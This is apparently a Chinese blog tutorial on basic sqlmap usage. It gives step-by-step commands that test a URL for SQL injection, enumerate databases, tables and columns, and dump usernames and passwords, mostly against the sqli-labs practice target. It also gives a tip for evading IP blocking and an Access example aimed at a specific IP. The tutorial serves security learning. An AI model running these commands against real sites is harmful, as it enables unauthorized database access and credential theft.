sqlmap基本使用

Mysql数据库
1、先检测是否可以注入,先判断是否可以正常注入:

sqlmap -u url -v 3

里面有个注意的点url后面必须是可注入的参数?id=之类的,否则url检测会有问题

对于某些今天url可以在/a/b.html尝试加入号来进行此路径内的检测

2、爆库

sqlmap.py -u http://sqli-labs-master/Less-... -v 3 --dbs --batch

3、根据爆出来的库查表

sqlmap.py -u http://sqli-labs-master/Less-... -v 3 -D "security" --tables --batch

4、根据表查字段

sqlmap.py -u http://sqli-labs-master/Less-... -v 3 -D "security" -T "users" --columns --batch

5、根据字段查值

sqlmap.py -u http://sqli-labs-master/Less-... -v 3 -D "security" -T "users" -C "username,password" --dump --batch

防止被IP拦截的操作,random-agent让请求头随机:

可以在后面增加--proxy http://127.0.0.1:8080 --random-agent -v 3

Access
对于Access数据库,直接报表就OK

sqlmap -u "http://192.168.96.16/shownews.asp?id=23" --tables

sqlmap里面的字典位置,内置字典位置为,可以根据自己的需要更改,对于Access一般就是直接暴库

sqlmap\data\txt

你可能感兴趣的:(安全sql注入安全测试)